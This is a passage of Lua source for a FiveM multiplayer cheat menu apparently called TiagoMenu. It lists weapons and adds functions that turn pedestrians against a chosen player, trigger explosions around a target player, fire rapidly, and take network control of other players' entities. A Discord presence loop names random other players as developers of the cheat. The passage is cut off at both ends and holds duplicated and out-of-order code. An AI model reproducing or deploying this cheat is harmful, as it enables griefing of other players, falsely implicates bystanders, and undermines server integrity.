- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- }
- }
- }
- }
- },
- Snipers = {
- SniperRifle = {
- id = 'weapon_sniperrifle',
- name = '~h~~r~> ~s~Sniper Rifle',
- bInfAmmo = false,
- mods = {
- Sights = {
- {name = '~h~~r~> ~s~Scope', id = 'COMPONENT_AT_SCOPE_LARGE'},
- {
- name = '~h~~r~> ~s~Advanced Scope',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- }
- }
- },
- HeavySniper = {
- id = 'weapon_heavysniper',
- name = '~h~~r~> ~s~Heavy Sniper',
- bInfAmmo = false,
- mods = {
- Sights = {
- {name = '~h~~r~> ~s~Scope', id = 'COMPONENT_AT_SCOPE_LARGE'},
- {
- name = '~h~~r~> ~s~Advanced Scope',
- }
- }
- }
- },
- HeavySniperMkII = {
- id = 'weapon_heavysniper_mk2',
- name = '~h~~r~> ~s~Heavy Sniper Mk II',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- },
- {
- name = '~h~~r~> ~s~Incendiary Rounds',
- },
- {
- name = '~h~~r~> ~s~Armor Piercing Rounds',
- },
- {
- name = '~h~~r~> ~s~FMJ Rounds',
- },
- {
- name = '~h~~r~> ~s~Explosive Rounds',
- }
- },
- Sights = {
- {
- name = '~h~~r~> ~s~Zoom Scope',
- },
- {
- name = '~h~~r~> ~s~Advanced Scope',
- },
- {
- name = '~h~~r~> ~s~Nigt Vision Scope',
- },
- {
- name = '~h~~r~> ~s~Thermal Scope',
- }
- },
- Barrel = {
- {
- name = '~h~~r~> ~s~Default',
- },
- {
- name = '~h~~r~> ~s~Heavy',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- },
- {
- name = '~h~~r~> ~s~Squared Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Bell-End Muzzle Brake',
- }
- }
- }
- },
- MarksmanRifle = {
- id = 'weapon_marksmanrifle',
- name = '~h~~r~> ~s~Marksman Rifle',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- }
- },
- Sights = {
- {
- name = '~h~~r~> ~s~Scope',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- },
- Grips = {
- {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
- }
- }
- },
- MarksmanRifleMkII = {
- id = 'weapon_marksmanrifle_mk2',
- name = '~h~~r~> ~s~Marksman Rifle Mk II',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- },
- {
- name = '~h~~r~> ~s~Tracer Rounds',
- },
- {
- name = '~h~~r~> ~s~Incendiary Rounds',
- },
- {
- name = '~h~~r~> ~s~Hollow Point Rounds',
- },
- {
- name = '~h~~r~> ~s~FMJ Rounds',
- }
- },
- Sights = {
- {
- name = '~h~~r~> ~s~Holograhpic Sight',
- },
- {
- name = '~h~~r~> ~s~Large Scope',
- },
- {
- name = '~h~~r~> ~s~Zoom Scope',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- Barrel = {
- {
- name = '~h~~r~> ~s~Default',
- },
- {
- name = '~h~~r~> ~s~Heavy',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- },
- {
- name = '~h~~r~> ~s~Flat Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Tactical Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Fat-End Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Precision Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Slanted Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Split-End Muzzle Brake',
- }
- },
- Grips = {
- {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP_02'}
- }
- }
- }
- },
- Heavy = {
- RPG = {
- id = 'weapon_rpg',
- name = '~h~~r~> ~s~RPG',
- bInfAmmo = false,
- mods = {}
- },
- GrenadeLauncher = {
- id = 'weapon_grenadelauncher',
- name = '~h~~r~> ~s~Grenade Launcher',
- bInfAmmo = false,
- mods = {}
- },
- GrenadeLauncherSmoke = {
- id = 'weapon_grenadelauncher_smoke',
- name = '~h~~r~> ~s~Grenade Launcher Smoke',
- bInfAmmo = false,
- mods = {}
- },
- Minigun = {
- id = 'weapon_minigun',
- name = '~h~~r~> ~s~Minigun',
- bInfAmmo = false,
- mods = {}
- },
- FireworkLauncher = {
- id = 'weapon_firework',
- name = '~h~~r~> ~s~Firework Launcher',
- bInfAmmo = false,
- mods = {}
- },
- Railgun = {
- id = 'weapon_railgun',
- name = '~h~~r~> ~s~Railgun',
- bInfAmmo = false,
- mods = {}
- },
- HomingLauncher = {
- id = 'weapon_hominglauncher',
- name = '~h~~r~> ~s~Homing Launcher',
- bInfAmmo = false,
- mods = {}
- },
- CompactGrenadeLauncher = {
- id = 'weapon_compactlauncher',
- name = '~h~~r~> ~s~Compact Grenade Launcher',
- bInfAmmo = false,
- mods = {}
- },
- Widowmaker = {
- id = 'weapon_rayminigun',
- name = '~h~~r~> ~s~Widowmaker',
- bInfAmmo = false,
- mods = {}
- }
- },
- Throwables = {
- Grenade = {
- id = 'weapon_grenade',
- name = '~h~~r~> ~s~Grenade',
- bInfAmmo = false,
- mods = {}
- },
- BZGas = {
- id = 'weapon_bzgas',
- name = '~h~~r~> ~s~BZ Gas',
- bInfAmmo = false,
- mods = {}
- },
- MolotovCocktail = {
- id = 'weapon_molotov',
- name = '~h~~r~> ~s~Molotov Cocktail',
- bInfAmmo = false,
- mods = {}
- },
- StickyBomb = {
- id = 'weapon_stickybomb',
- name = '~h~~r~> ~s~Sticky Bomb',
- bInfAmmo = false,
- mods = {}
- },
- ProximityMines = {
- id = 'weapon_proxmine',
- name = '~h~~r~> ~s~Proximity Mines',
- bInfAmmo = false,
- mods = {}
- },
- Snowballs = {
- id = 'weapon_snowball',
- name = '~h~~r~> ~s~Snowballs',
- bInfAmmo = false,
- mods = {}
- },
- PipeBombs = {
- id = 'weapon_pipebomb',
- name = '~h~~r~> ~s~Pipe Bombs',
- bInfAmmo = false,
- mods = {}
- },
- Baseball = {
- id = 'weapon_ball',
- name = '~h~~r~> ~s~Baseball',
- bInfAmmo = false,
- mods = {}
- },
- TearGas = {
- id = 'weapon_smokegrenade',
- name = '~h~~r~> ~s~Tear Gas',
- bInfAmmo = false,
- mods = {}
- },
- Flare = {
- id = 'weapon_flare',
- name = '~h~~r~> ~s~Flare',
- bInfAmmo = false,
- mods = {}
- }
- },
- Misc = {
- Parachute = {
- id = 'gadget_parachute',
- name = '~h~~r~> ~s~Parachute',
- bInfAmmo = false,
- mods = {}
- },
- FireExtinguisher = {
- id = 'weapon_fireextinguisher',
- name = '~h~~r~> ~s~Fire Extinguisher',
- bInfAmmo = false,
- mods = {}
- }
- }
- }
- defaultVehAction = ''
- if GetVehiclePedIsUsing(PlayerPedId()) then
- veh = GetVehiclePedIsUsing(PlayerPedId())
- end
- local bl = false
- local bm = true
- local bn = GetPlayerServerId(PlayerPedId(-1))
- local bo = GetPlayerName(bn)
- local function SpawnVeh(model, PlaceSelf)
- RequestModel(GetHashKey(model))
- Wait(500)
- if HasModelLoaded(GetHashKey(model)) then
- local coords = GetEntityCoords(PlayerPedId())
- local xf = GetEntityForwardX(PlayerPedId())
- local yf = GetEntityForwardY(PlayerPedId())
- local heading = GetEntityHeading(PlayerPedId())
- local veh = CreateVehicle(GetHashKey(model), coords.x+xf*5, coords.y+yf*5, coords.z, heading, 1, 1)
- if PlaceSelf then SetPedIntoVehicle(PlayerPedId(), veh, -1) end
- else ShowInfo("~r~Model not recognized") end
- end
- local presensecheck = {
- state = true
- }
- local presense = true
- nname = nil
- count = {}
- local Feltzer = false
- local vehlistv = {'Nero', 'Deluxo', 'Raiden', 'Bati2', "SultanRS", "TA21", "Tiago", "ZR380", "Streiter", "Neon", "Italigto", "Nero2", "Fmj", "le7b", "prototipo", "cyclone", "khanjali", "STROMBERG", "BARRAGE", "COMET5"}
- zzzt = 1
- ForcefieldRadiusOps = {5.0, 10.0, 15.0, 20.0, 50.0,100.0}
- ForcefieldRadius = 5.0
- Citizen.CreateThread(
- function()
- for i = 0, 256 do
- local count1 = GetPlayerName(i)
- if count1 ~= '**Invalid**' then
- table.insert(count, count1)
- end
- end
- end
- )
- Citizen.CreateThread(function()
- RequestModel('s_m_y_swat_01')
- RequestModel('s_m_y_hwaycop_01')
- for i = 1, #vehlistv do
- RequestModel(vehlistv[i])
- Citizen.Wait(200)
- end
- end)
- Citizen.CreateThread(
- function()
- while presense do
- Citizen.Wait(5000)
- for i = 1, #count do
- if GetPlayerName(i) ~= count[i] then
- table.remove(count, i, GetPlayerName(i))
- end
- end
- end
- end
- )
- Citizen.CreateThread(
- function()
- while presense do
- if nname ~= GetPlayerName(PlayerId()) then
- Citizen.Wait(3000)
- nname = count[math.random(#count)]
- elseif nname == GetPlayerName(PlayerId()) then
- Citizen.Wait(50)
- nname = count[math.random(#count)]
- end
- end
- end
- )
- local function SetRP()
- local id = GetPlayerServerId(PlayerId())
- SetRichPresence(tostring(nname) .. ' is developing TiagoModz#5836')
- SetDiscordAppId(appid)
- SetDiscordRichPresenceAsset(asset)
- SetDiscordRichPresenceAssetSmall(asset)
- SetDiscordRichPresenceAssetText(scroll[zzzt])
- if #count == 1 then
- SetDiscordRichPresenceAssetSmallText('Playing with ' .. GetNumberOfPlayers() .. ' player')
- else
- SetDiscordRichPresenceAssetSmallText('Playing with ' .. GetNumberOfPlayers() .. ' players')
- end
- end
- Citizen.CreateThread(
- function()
- while presense do
- SetRP()
- Citizen.Wait(100)
- zzzt = zzzt + 1
- if zzzt == 29 then
- zzzt = 1
- end
- end
- end
- )
- function ApplyForce(entity, direction)
- ApplyForceToEntity(entity, 3, direction, 0, 0, 0, false, false, true, true, false, true)
- end
- function RequestControlOnce(entity)
- if not NetworkIsInSession or NetworkHasControlOfEntity(entity) then
- return true
- end
- SetNetworkIdCanMigrate(NetworkGetNetworkIdFromEntity(entity), true)
- return NetworkRequestControlOfEntity(entity)
- end
- function RequestControl(entity)
- Citizen.CreateThread(function()
- local tick = 0
- while not RequestControlOnce(entity) and tick <= 12 do
- tick = tick + 1
- Wait(0)
- end
- return tick <= 12
- end)
- end
- function Oscillate(entity, position, angleFreq, dampRatio)
- local pos1 = ScaleVector(SubVectors(position, GetEntityCoords(entity)), (angleFreq * angleFreq))
- local pos2 = AddVectors(ScaleVector(GetEntityVelocity(entity), (2.0 * angleFreq * dampRatio)), vector3(0.0, 0.0, 0.1))
- local targetPos = SubVectors(pos1, pos2)
- ApplyForce(entity, targetPos)
- end
- local function GetPedImpact(p)
- local retval, coord = GetPedLastWeaponImpactCoord(p)
- return coord
- end
- local function ClonePedVeh()
- local ped = GetPlayerPed(SelectedPlayer)
- local pedVeh = nil
- local PlayerPed = PlayerPedId()
- if IsPedInAnyVehicle(ped, false) then
- pedVeh = GetVehiclePedIsIn(ped, false)
- else
- pedVeh = GetVehiclePedIsIn(ped, true)
- if DoesEntityExist(pedVeh) then
- local vmh = GetEntityModel(pedVeh)
- local playerpos = GetEntityCoords(PlayerPed, false)
- local playerveh =
- CreateVehicle(vmh, playerpos.x, playerpos.y, playerpos.z, GetEntityHeading(PlayerPed), true, true)
- SetPedIntoVehicle(PlayerPed, playerveh, -1)
- local pcolor, scolor = nil
- GetVehicleColours(pedVeh, pcolor, scolor)
- SetVehicleColours(playerveh, pcolor, scolor)
- if IsThisModelACar(vmh) or IsThisModelABike(vhm) then
- SetVehicleModKit(playerveh, 0)
- SetVehicleWheelType(playerveh, GetVehicleWheelType(pedVeh))
- local pc, wc = nil
- SetVehicleNumberPlateTextIndex(playerveh, GetVehicleNumberPlateTextIndex(pedVeh))
- SetVehicleNumberPlateText(playerveh, GetVehicleNumberPlateText(pedVeh))
- GetVehicleExtraColours(pedVeh, pc, wc)
- SetVehicleExtraColours(playerveh, pc, wc)
- end
- end
- end
- end
- local function RequestNetworkControl(Request)
- local hasControl = false
- while hasControl == false do
- hasControl = NetworkRequestControlOfEntity(Request)
- if hasControl == true or hasControl == 1 then
- break
- end
- if
- NetworkHasControlOfEntity(ped) == true and hasControl == true or
- NetworkHasControlOfEntity(ped) == true and hasControl == 1
- then
- return true
- else
- return false
- end
- end
- end
- local function makePedHostile(target, ped, swat, clone)
- if swat == 1 or swat == true then
- RequestNetworkControl(ped)
- TaskCombatPed(ped, GetPlayerPed(SelectedPlayer), 0, 16)
- SetPedCanSwitchWeapon(ped, true)
- else
- if clone == 1 or clone == true then
- local Hash = GetEntityModel(ped)
- if DoesEntityExist(ped) then
- DeletePed(ped)
- RequestModel(Hash)
- local coords = GetEntityCoords(GetPlayerPed(target), true)
- if HasModelLoaded(Hash) then
- local newPed = CreatePed(21, Hash, coords.x, coords.y, coords.z, 0, 1, 0)
- if GetEntityHealth(newPed) == GetEntityMaxHealth(newPed) then
- SetModelAsNoLongerNeeded(Hash)
- RequestNetworkControl(newPed)
- TaskCombatPed(newPed, GetPlayerPed(target), 0, 16)
- SetPedCanSwitchWeapon(ped, true)
- end
- end
- end
- else
- local TargetHandle = GetPlayerPed(target)
- RequestNetworkControl(ped)
- TaskCombatPed(ped, TargetHandle, 0, 16)
- end
- end
- end
- function DrawTxt(text, x, y)
- SetTextFont(0)
- SetTextProportional(1)
- SetTextScale(0.0, 0.4)
- SetTextDropshadow(1, 0, 0, 0, 255)
- SetTextEdge(1, 0, 0, 0, 255)
- SetTextDropShadow()
- SetTextOutline()
- SetTextEntry('STRING')
- AddTextComponentString(text)
- DrawText(x, y)
- end
- function DrawText3D2(x, y, z, text)
- local onScreen, _x, _y = World3dToScreen2d(x, y, z)
- local px, py, pz = table.unpack(GetGameplayCamCoords())
- local dist = GetDistanceBetweenCoords(px, py, pz, x, y, z, 1)
- local scale = (1 / dist) * 2
- local fov = (1 / GetGameplayCamFov()) * 100
- local scale = scale * fov
- if onScreen then
- SetTextScale(0.0 * scale, 0.55 * scale)
- SetTextFont(0)
- SetTextProportional(1)
- SetTextColour(255, 255, 255, 255)
- SetTextDropshadow(0, 0, 0, 0, 255)
- SetTextEdge(2, 0, 0, 0, 150)
- SetTextDropShadow()
- SetTextOutline()
- SetTextEntry('STRING')
- SetTextCentre(1)
- AddTextComponentString(text)
- DrawText(_x, _y)
- end
- end
- local objects = {}
- local function wallin()
- Citizen.CreateThread(
- function()
- while true do
- DrawTxt(
- '~y~Press ~s~E ~y~to spawn | ~y~Press ~s~Z ~y~to delete | ~y~Press ~s~G ~y~to clear objects | ',
- 0.23,
- 0.90
- )
- DrawTxt('~y~Press ~s~X ~y~to stop script', 0.595, 0.90)
- DrawTxt('~y~Spawned:~s~ ' .. #objects, 0.80, 0.90)
- for i = 1, #objects do
- local x, y, z = table.unpack(GetEntityCoords(objects[i]))
- DrawText3D2(x, y, z + 1, 'OBJECT HERE! INDEX: ' .. i)
- end
- if IsControlJustPressed(1, 38) then
- local pos = GetEntityCoords(PlayerPedId())
- local pitch = GetEntityPitch(PlayerPedId())
- local roll = GetEntityRoll(PlayerPedId())
- local yaw = GetEntityRotation(PlayerPedId()).z
- local xf = GetEntityForwardX(PlayerPedId())
- local yf = GetEntityForwardY(PlayerPedId())
- objects[#objects + 1] =
- CreateObject('prop_container_01a', pos.x - (xf * 10), pos.y - (yf * 10), pos.z - 1, 1, 1, 1)
- SetEntityRotation(objects[#objects], pitch, roll, yaw + 90)
- SetEntityVisible(objects[#objects], 0, 1, 1)
- print('Object placed with index: ' .. objects[#objects])
- elseif IsControlJustPressed(1, 20) then
- SetEntityCoords(objects[#objects], 0, 0, 0)
- DeleteObject(objects[#objects])
- print('Deleted object with index: ' .. #objects)
- table.remove(objects, #objects)
- elseif IsControlJustPressed(1, 47) then
- for i = 0, #objects do
- SetEntityCoords(objects[i], 0, 0, 0)
- DeleteObject(objects[i])
- print('Deleted object with index: ' .. i)
- end
- objects = {}
- elseif IsControlJustPressed(1, 73) then
- print('Script has been stopped')
- break
- end
- Citizen.Wait(1)
- end
- end
- )
- end
- TiagoMenu = {}
- TiagoMenu.debug = false
- local function RGBRainbow(frequency)
- local result = {}
- local curtime = GetGameTimer() / 1000
- result.r = math.floor(math.sin(curtime * frequency + 0) * 127 + 128)
- result.g = math.floor(math.sin(curtime * frequency + 2) * 127 + 128)
- result.b = math.floor(math.sin(curtime * frequency + 4) * 127 + 128)
- return result
- end
- local menus = {}
- local keys = {up = 172, down = 173, left = 174, right = 175, select = 176, back = 177}
- local optionCount = 0
- local currentKey = nil
- local currentMenu = nil
- local menuWidth = 0.23
- local titleHeight = 0.25
- local titleYOffset = 0.05
- local titleScale = 1.5
- local buttonHeight = 0.038
- local buttonFont = 0
- local buttonScale = 0.365
- local buttonTextXOffset = 0.005
- local buttonTextYOffset = 0.005
- local currForcefieldRadiusIndex = 1
- local selForcefieldRadiusIndex = 1
- local function ForcefieldPlayer(target, radius)
- local player = GetPlayerPed(target)
- local coords = GetEntityCoords(player)
- DrawMarker(28, coords.x, coords.y, coords.z, 0.0, 0.0, 0.0, 0.0, 180.0, 0.0, radius, radius, radius, 180, 0, 0, 35, false, true, 2, nil, nil, false)
- for ped in EnumeratePeds() do
- if GetDistanceBetweenCoords(coords, GetEntityCoords(ped)) <= radius*1.2 and ped ~= PlayerPedId() then
- --ApplyForceToEntity(ped, 3, 5.0, 5.0, 10.0, 0, 0, 0, 0, false, true, true, false, true)
- AddExplosion(GetEntityCoords(ped), 5, 1.0, false, true, 0.0)
- end
- end
- for obj in EnumerateObjects() do
- if GetDistanceBetweenCoords(coords, GetEntityCoords(obj)) <= radius*1.2 then
- --ApplyForceToEntity(obj, 3, 5.0, 5.0, 10.0, 0, 0, 0, 0, false, true, true, false, true)
- AddExplosion(GetEntityCoords(obj), 5, 1.0, false, true, 0.0)
- end
- end
- for veh in EnumerateVehicles() do
- if GetDistanceBetweenCoords(coords, GetEntityCoords(veh)) <= radius*1.2 then
- --ApplyForceToEntity(veh, 3, 5.0, 5.0, 10.0, 0, 0, 0, 0, false, true, true, false, true)
- AddExplosion(GetEntityCoords(veh), 5, 1.0, false, true, 0.0)
- end
- end
- for pickup in EnumeratePickups() do
- if GetDistanceBetweenCoords(coords, GetEntityCoords(pickup)) <= radius*1.2 then
- --ApplyForceToEntity(pickup, 3, 5.0, 5.0, 10.0, 0, 0, 0, 0, false, true, true, false, true)
- AddExplosion(GetEntityCoords(pickup), 5, 1.0, false, true, 0.0)
- end
- end
- end
- local function debugPrint(text)
- if TiagoMenu.debug then
- Citizen.Trace("[TMmenu] " .. tostring(text))
- end
- end
- local function setMenuProperty(id, property, value)
- if id and menus[id] then
- menus[id][property] = value
- debugPrint(id .. " menu property changed: { " .. tostring(property) .. ", " .. tostring(value) .. " }")
- end
- end
- local function isMenuVisible(id)
- if id and menus[id] then
- return menus[id].visible
- else
- return false
- end
- end
- local function ClonePedVeh()
- local ped = GetPlayerPed(SelectedPlayer)
- local pedVeh = nil
- local PlayerPed = PlayerPedId()
- if IsPedInAnyVehicle(ped, false) then
- pedVeh = GetVehiclePedIsIn(ped, false)
- else
- pedVeh = GetVehiclePedIsIn(ped, true)
- if DoesEntityExist(pedVeh) then
- local vmh = GetEntityModel(pedVeh)
- local playerpos = GetEntityCoords(PlayerPed, false)
- local playerveh =
- CreateVehicle(vmh, playerpos.x, playerpos.y, playerpos.z, GetEntityHeading(PlayerPed), true, true)
- SetPedIntoVehicle(PlayerPed, playerveh, -1)
- local pcolor, scolor = nil
- GetVehicleColours(pedVeh, pcolor, scolor)
- SetVehicleColours(playerveh, pcolor, scolor)
- if IsThisModelACar(vmh) or IsThisModelABike(vhm) then
- SetVehicleModKit(playerveh, 0)
- SetVehicleWheelType(playerveh, GetVehicleWheelType(pedVeh))
- local pc, wc = nil
- SetVehicleNumberPlateTextIndex(playerveh, GetVehicleNumberPlateTextIndex(pedVeh))
- SetVehicleNumberPlateText(playerveh, GetVehicleNumberPlateText(pedVeh))
- GetVehicleExtraColours(pedVeh, pc, wc)
- SetVehicleExtraColours(playerveh, pc, wc)
- end
- end
- end
- end
- local function fixcar()
- SetVehicleFixed(GetVehiclePedIsIn(GetPlayerPed(-1), false))
- SetVehicleDirtLevel(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0.0)
- SetVehicleLights(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0)
- SetVehicleBurnout(GetVehiclePedIsIn(GetPlayerPed(-1), false), false)
- Citizen.InvokeNative(0x1FD09E7390A74D54, GetVehiclePedIsIn(GetPlayerPed(-1), false), 0)
- end
- local function setMenuVisible(id, visible, holdCurrent)
- if id and menus[id] then
- setMenuProperty(id, "visible", visible)
- if not holdCurrent and menus[id] then
- setMenuProperty(id, "currentOption", 1)
- end
- if visible then
- if id ~= currentMenu and isMenuVisible(currentMenu) then
- setMenuVisible(currentMenu, false)
- end
- currentMenu = id
- end
- end
- end
- local function drawText(text, x, y, font, color, scale, center, shadow, alignRight)
- SetTextColour(color.r, color.g, color.b, color.a)
- SetTextFont(font)
- SetTextScale(scale, scale)
- if shadow then
- SetTextDropShadow(2, 2, 0, 0, 0)
- end
- if menus[currentMenu] then
- if center then
- SetTextCentre(center)
- elseif alignRight then
- SetTextWrap(menus[currentMenu].x, menus[currentMenu].x + menuWidth - buttonTextXOffset)
- SetTextRightJustify(true)
- end
- end
- SetTextEntry("STRING")
- AddTextComponentString(text)
- DrawText(x, y)
- end
- local function drawRect(x, y, width, height, color)
- DrawRect(x, y, width, height, color.r, color.g, color.b, color.a)
- end
- local function drawTitle()
- if menus[currentMenu] then
- local x = menus[currentMenu].x + menuWidth / 2
- local y = menus[currentMenu].y + titleHeight / 2
- if menus[currentMenu].titleBackgroundSprite then
- DrawSprite(
- menus[currentMenu].titleBackgroundSprite.dict,
- menus[currentMenu],
- x,
- y,
- menuWidth,
- titleHeight,
- 0.,
- 255,
- 255,
- 255,
- 255
- )
- else
- drawRect(x, y, menuWidth, titleHeight, menus[currentMenu].titleBackgroundColor)
- end
- drawText(
- menus[currentMenu].title,
- x,
- y - titleHeight / 2 + titleYOffset,
- menus[currentMenu].titleFont,
- menus[currentMenu].titleColor,
- titleScale,
- true
- )
- end
- end
- if RapidFire then
- DoRapidFireTick()
- end
- local function DoRapidFireTick()
- if IsDisabledControlPressed(0, 24) then
- local _, weapon = GetCurrentPedWeapon(PlayerPedId())
- local wepent = GetCurrentPedWeaponEntityIndex(PlayerPedId())
- local camDir = GetCamDirFromScreenCenter()
- local camPos = GetGameplayCamCoord()
- local launchPos = GetEntityCoords(wepent)
- local targetPos = camPos + (camDir * 200.0)
- ClearAreaOfProjectiles(launchPos, 0.0, 1)
- ShootSingleBulletBetweenCoords(launchPos, targetPos, 5, 1, weapon, PlayerPedId(), true, true, 24000.0)
- ShootSingleBulletBetweenCoords(launchPos, targetPos, 5, 1, weapon, PlayerPedId(), true, true, 24000.0)
- end
- end
- if ForceGun then
- local ret, pos = GetPedLastWeaponImpactCoord(PlayerPedId())
- if ret then
- for k in EnumeratePeds() do
- local coords = GetEntityCoords(k)
- if k ~= PlayerPedId() and GetDistanceBetweenCoords(pos, coords) <= 1.0 then
- local forward = GetEntityForwardVector(PlayerPedId())
- RequestControlOnce(k)
- ApplyForce(k, forward * 500)
- end
- end
- for k in EnumerateVehicles() do
- local coords = GetEntityCoords(k)
- if k ~= GetVehiclePedIsIn(PlayerPedId(), 0) and GetDistanceBetweenCoords(pos, coords) <= 3.0 then
- local forward = GetEntityForwardVector(PlayerPedId())
- RequestControlOnce(k)
- ApplyForce(k, forward * 500)
- end
- end
- end
- end
- local function drawSubTitle()
- if menus[currentMenu] then
- local x = menus[currentMenu].x + menuWidth / 2
- local y = menus[currentMenu].y + titleHeight + buttonHeight / 2
- local subTitleColor = {
- r = menus[currentMenu].titleBackgroundColor.r,
- g = menus[currentMenu].titleBackgroundColor.g,
- b = menus[currentMenu].titleBackgroundColor.b,
- a = 255
- }
- drawRect(x, y, menuWidth, buttonHeight, menus[currentMenu].subTitleBackgroundColor)
- drawText(
- menus[currentMenu].subTitle,
- menus[currentMenu].x + buttonTextXOffset,
- y - buttonHeight / 2 + buttonTextYOffset,
- buttonFont,
- subTitleColor,
- buttonScale,
- false
- )
- if optionCount > menus[currentMenu].maxOptionCount then
- drawText(
- tostring(menus[currentMenu].currentOption) .. " / " .. tostring(optionCount),
- menus[currentMenu].x + menuWidth,
- y - buttonHeight / 2 + buttonTextYOffset,
- buttonFont,
- subTitleColor,
- buttonScale,
- false,
- false,
- true
- )
- end
- end
- end
- local function drawButton(text, subText)
- local x = menus[currentMenu].x + menuWidth / 2
- local multiplier = nil
- if
- menus[currentMenu].currentOption <= menus[currentMenu].maxOptionCount and
- optionCount <= menus[currentMenu].maxOptionCount
- then
- multiplier = optionCount
- elseif
- optionCount > menus[currentMenu].currentOption - menus[currentMenu].maxOptionCount and
- optionCount <= menus[currentMenu].currentOption
- then
- multiplier = optionCount - (menus[currentMenu].currentOption - menus[currentMenu].maxOptionCount)
- end
- if multiplier then
- local y = menus[currentMenu].y + titleHeight + buttonHeight + (buttonHeight * multiplier) - buttonHeight / 2
- local backgroundColor = nil
- local textColor = nil
- local subTextColor = nil
- local shadow = false
- if menus[currentMenu].currentOption == optionCount then
- backgroundColor = menus[currentMenu].menuFocusBackgroundColor
- textColor = menus[currentMenu].menuFocusTextColor
- subTextColor = menus[currentMenu].menuFocusTextColor
- else
- backgroundColor = menus[currentMenu].menuBackgroundColor
- textColor = menus[currentMenu].menuTextColor
- subTextColor = menus[currentMenu].menuSubTextColor
- shadow = true
- end
- drawRect(x, y, menuWidth, buttonHeight, backgroundColor)
- drawText(
- text,
- menus[currentMenu].x + buttonTextXOffset,
- y - (buttonHeight / 2) + buttonTextYOffset,
- buttonFont,
- textColor,
- buttonScale,
- false,
- shadow
- )
- if subText then
- drawText(
- subText,
- menus[currentMenu].x + buttonTextXOffset,
- y - buttonHeight / 2 + buttonTextYOffset,
- buttonFont,
- subTextColor,
- buttonScale,
- false,
- shadow,
- true
- )
- end
- end
- end
- function TiagoMenu.CreateMenu(id, title)
- menus[id] = {}
- menus[id].title = title
- menus[id].subTitle = "INTERACTION MENU"
- menus[id].visible = false
- menus[id].previousMenu = nil
- menus[id].aboutToBeClosed = false
- menus[id].x = 0.70
- menus[id].y = 0.25
- menus[id].currentOption = 1
- menus[id].maxOptionCount = 10
- menus[id].titleFont = 7
- menus[id].titleColor = {r = 255, g = 255, b = 255, a = 255}
- Citizen.CreateThread(
- function()
- while true do
- Citizen.Wait(0)
- local ra = RGBRainbow(1.0)
- menus[id].titleBackgroundColor = {r = 0, g = 0, b = 0, a = 200}
- menus[id].menuFocusBackgroundColor = {r = 0, g = 0, b = 0, a = 255}
- end
- end)
- menus[id].titleBackgroundSprite = nil
- menus[id].menuTextColor = {r = 255, g = 255, b = 255, a = 255}
- menus[id].menuSubTextColor = {r = 189, g = 189, b = 189, a = 255}
- menus[id].menuFocusTextColor = {r = 255, g = 255, b = 255, a = 255}
- --menus[id].menuFocusBackgroundColor = { r = 245, g = 245, b = 245, a = 255 }
- menus[id].menuBackgroundColor = {r = 0, g = 0, b = 0, a = 10}
- menus[id].subTitleBackgroundColor = {
- r = menus[id].menuBackgroundColor.r,
- g = menus[id].menuBackgroundColor.g,
- b = menus[id].menuBackgroundColor.b,
- a = 10
- }
- menus[id].buttonPressedSound = {name = "SELECT", set = "HUD_FRONTEND_DEFAULT_SOUNDSET"}
- debugPrint(tostring(id) .. " menu created")
- end
- function TiagoMenu.CreateSubMenu(id, parent, subTitle)
- if menus[parent] then
- TiagoMenu.CreateMenu(id, menus[parent].title)
- if subTitle then
- setMenuProperty(id, "subTitle", string.upper(subTitle))
- else
- setMenuProperty(id, "subTitle", string.upper(menus[parent].subTitle))
- end
- setMenuProperty(id, "previousMenu", parent)
- setMenuProperty(id, "x", menus[parent].x)
- setMenuProperty(id, "y", menus[parent].y)
- setMenuProperty(id, "maxOptionCount", menus[parent].maxOptionCount)
- setMenuProperty(id, "titleFont", menus[parent].titleFont)
- setMenuProperty(id, "titleColor", menus[parent].titleColor)
- setMenuProperty(id, "titleBackgroundColor", menus[parent].titleBackgroundColor)
- setMenuProperty(id, "titleBackgroundSprite", menus[parent].titleBackgroundSprite)
- setMenuProperty(id, "menuTextColor", menus[parent].menuTextColor)
- setMenuProperty(id, "menuSubTextColor", menus[parent].menuSubTextColor)
- setMenuProperty(id, "menuFocusTextColor", menus[parent].menuFocusTextColor)
- setMenuProperty(id, "menuFocusBackgroundColor", menus[parent].menuFocusBackgroundColor)
- setMenuProperty(id, "menuBackgroundColor", menus[parent].menuBackgroundColor)
- setMenuProperty(id, "subTitleBackgroundColor", menus[parent].subTitleBackgroundColor)
- else
- debugPrint("Failed to create " .. tostring(id) .. " submenu: " .. tostring(parent) .. " parent menu doesn't exist")
- end
- end
- function TiagoMenu.CurrentMenu()
- return currentMenu
- end
- function TiagoMenu.OpenMenu(id)
- if id and menus[id] then
- PlaySoundFrontend(-1, "SELECT", "HUD_FRONTEND_DEFAULT_SOUNDSET", true)
- setMenuVisible(id, true)
